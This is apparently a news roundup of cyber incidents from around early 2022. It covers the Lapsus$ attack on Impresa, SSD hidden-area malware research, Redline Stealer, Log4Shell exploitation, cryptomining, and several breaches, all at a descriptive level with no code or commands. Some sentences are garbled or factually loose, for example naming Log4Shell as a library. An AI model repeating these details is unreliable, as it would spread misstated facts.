Due to the advancement in digitization, and the rise of internet technologies, cybersecurity threats have become pervasive. Cybercriminal groups have become more sophisticated, and many threats to cyber safety are beyond our control. These attacks cause severe damage to a different sector, such as it can cause financial damage, regulatory penalties, reputation damage, lawsuits, and business continuity disruptions.
No organization is safe in the present digital world. As intruders increasingly rely on the latest and sophisticated technologies, organizations feel hopeless as their critical assets and confidential data fall prey to these attacks. Moreover, the rapid adoption of advanced technologies, such as Artificial Intelligence, Machine Learning, Cloud Computing, and the Internet of Things, has added new threats to organizations.
In this article, we will look at the recent cyber incidents happening around the globe in the last few days. Let’s get started.
Lapsus$ gang hits SIC
The ransomware gang of Lapsus$ got hacked and is eliciting Impresa. The hack has occurred during the new year’s holiday and hit the company’s online IT infrastructure. Therefore, websites from the Expresso, Impressa group and all the SIC TV channels are offline now. However, cable TV and airwave broadcasts are operating conventionally, but the hack has taken down the SIC’s online streaming capabilities.
The Lapsus$ group took credit for the hack by effacing all the Impressa’s websites with a ransom note. The message claims that the Lapsus$ group has gained access to the Amazon Web Services account of Impresa. However, Impresa staff regained control over this account when all the websites were put into maintenance mode. But attackers tweeted from Expresso’s Twitter account, showing that they still have access to the company’s resources. It’s one of the biggest cybersecurity attacks in Portugal’s history.
Persistent malware in hidden SSD area
Korean researchers have originated a set of attacks against Solid State Drives (SSD), planting malware in areas that are beyond the access of security solutions and users. The attack model targets a hidden area on the device, called over-provisioning, widely used by SSD manufactures for performance optimization. Hardware-level attacks provide ultimate stealth and persistence.
Research at Korea University explains that the attacker can modify the over-provisioning (OP) area size by leveraging the firmware manager. This can generate exploitable invalid data space. The problem due to which the attack happened is that many SSD makers choose not to delete invalid data areas and the space remains filled with data for long periods. Threat actors leveraged this vulnerability and gained access to critically sensitive data.
Redline Stealer Malware targeting autologin feature of browsers
The Redline information-stealing malware uses the browser autologin feature to steal credentials. On the cyber-crome forums, this malware is available at the cost of $200. It is a commodity information-stealer that can be deployed by beginners with little knowledge of all browsers, including Chrome, Opera, Firefox, and Microsoft Edge. AhnLab SEC, a cybersecurity firm, has warned that the autologin feature is becoming the common target of cybercriminals. It is significantly impacting both users and organizations.
Moreover, it works well on the systems that have anti-malware installed. According to a report, there is a ‘Login Data’ file on all chromium-based browsers that is targeted by the malware. In this file, the usernames and passwords of users are stored. The Readline stealer collects information from browsers, including login account and password, cookies, autofill, credit card information, seed files, crypto wallet info, and more. This malware was first spotted in March 2020, and it was later distributed via various mediums, such as phishing emails, disguising as editing tools, and abusing of Google ads. Users must follow and configure security rules to stay protected.
RIPTA data breach
Recently a data breach occurred at RIPTA (Rhode Island Public Transit Authority), compromising potentially sensitive information, such as names, addresses, social security numbers, medicare information, birth dates, claims information, and health insurance member identification. The breach was first detected earlier in August, and now RIPTA disclosed it on their website on December 21.
In a recent statement, the company said that the incident involved the PI of their health plan beneficiaries. The American Civil Liberties Union has received complaints from the victims having no direct connection to the RIPTA. The U.S Department of the Heath and Human Services has shown a report stating that over 5,000 users were affected by this breach.
Log4Shell Exploit to target academic institution
Chinese APT hackers have been observed using critical vulnerabilities in the Apache Log4Shell logging library to perform several post-exploitation operations. Cybersecurity firm CrowdStrike said that the exploitation was aimed at a large academic institution. The intrusion exploited the newly discovered vulnerability in Log4Shell to access a flawed instance of the VMware Horizon desktop and application virtualization product. This intrusion was followed by executing a series of malicious commands to fetch payloads hosted on a remote server.
The malicious behavior of Aquatic Panda went beyond conducting an exploration of the compromised host. It started with making an effort to hinder a third-party endpoint detection and response service before retrieving next-stage payloads for obtaining a reverse-shell and getting credentials. However, when the target was alerted to the incident, they were unable to implement the incident response protocol immediately.
Autom Cryptomining malware attacks
An ongoing crypto mining campaign has evolved its defense evasion tactics, allowing the threat actor to obscure the intrusions. It was first detected in 2019 with 84 attacks against its honeypot servers, and then 125 attacks were spotted in the third quarter of 2021. Initial intrusions involved running a malicious command upon executing a vanilla image named “alpine: latest”. It caused downloading a shell script named “autom.sh.”
The shell script starts the attack sequence that allows the adversary to create a new account and update the privileges to the root user. Cybercriminals carried out malware campaigns to hijack the system for mining cryptocurrencies. Apart from it, TeamTNT, a hacking group, has been observed striking unsecured database servers, exposed Docker APIs, Alibaba Elastic Computing Services instances, and flawed Kubernetes clusters to execute malicious code on the targeted hosts and deploy crypto mining payloads.
Vulnerabilities in Microsoft Teams
Multiple vulnerabilities in Microsoft Teams have been detected that allow intruders to leak IP addresses, spoof link previews, and access internet services. A team of security researchers has discovered four vulnerabilities, server-side request forgery, URL preview spoofing, denial-of-service flaw, and IP address leak vulnerability. The team explained that it could enable cybercriminals to direct users towards fraudulent websites, opening the door to a host of suspicious activities.
Moreover, researchers detected two security flaws affecting Android users. First, the IP address leak vulnerability exposes the IP address of the user. Second, the denial-of-service vulnerability, rendering the application channels unusable with a particular crafted message. However, Microsoft has patched only one of these vulnerabilities so far, the IP address problem in the Android. The researchers suggested checking the URL in the address bar after following a link, regarding the spoofing issue.
Cyberattack on Norway media company
Amedia, the largest local news publisher in Norway, announced on Tuesday that many of its central systems were shut down, which is a serious cyber attack. The attack restricted the company from printing the physical newspaper on Wednesday, and presses will continue to be halted until the problem is resolved. The attack also impacted the company’s subscription and advertising systems, preventing advertisers from buying new ads and restricting subscribers from making or canceling subscriptions.
The company said that it is not confirmed whether the personal information has been compromised. The compromised subscription system contains the names, phone numbers, addresses, and subscription histories of users. Data such as read history, passwords, and financial information are not affected. Amedia published more than 90 newspapers and publications, reaching more than 2.5 million Norwegians.
SIM swapping attacks at T-Mobile
SIM swapping attacks cause T-Mobile to suffer from a data breach, exposing the potentially sensitive information of customers. Unauthorized activity on some customers’ accounts resulted in exposed personal information or SIM swaps. Both of these can have dreadful consequences for customers. It enables criminals to sap the SIM card linked with a number to bypass multi-factor authentication on the target’s accounts.
T-Mobile has been a victim of cyber attacks over the past few years with worrying regularity. A data breach has impacted 3 percent of the company’s 77 million users in 2018. Their IT system is vulnerable, and they have not been able to solve known security issues till now. As a result, data of prepaid, postpaid, and prospective users were stolen.
RSAC postponed due to safety and health concerns
The RSA Conference 2022 has been postponed due to the COVID-19 pandemic. The conference was scheduled for February 2022, but it will now happen digitally and in-person from 6-9 June at the Moscone Center in San Francisco. The Vice President of RSA Conference, Linda Gray Martin, excused in an email to conference registrants. For attendees who already registered for the conference and planning to attend in June, their passes will automatically validate by the RSA team.
The opinions expressed in this post belongs to the individual contributors and do not necessarily reflect the views of Information Security Buzz.